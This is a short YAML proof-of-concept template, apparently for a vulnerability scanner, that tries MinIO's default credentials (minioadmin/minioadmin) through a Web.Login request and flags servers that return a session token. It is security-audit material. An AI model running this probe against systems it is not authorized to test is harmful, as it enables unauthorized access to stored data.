name: poc-yaml-minio-default-password
rules:
  - method: POST
    path: /minio/webrpc
    headers:
      Content-Type: application/json
    body: >-
      {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token") && response.content_type.contains("json")
detail:
  author: harris2015
  links:
    - https://docs.min.io/cn/
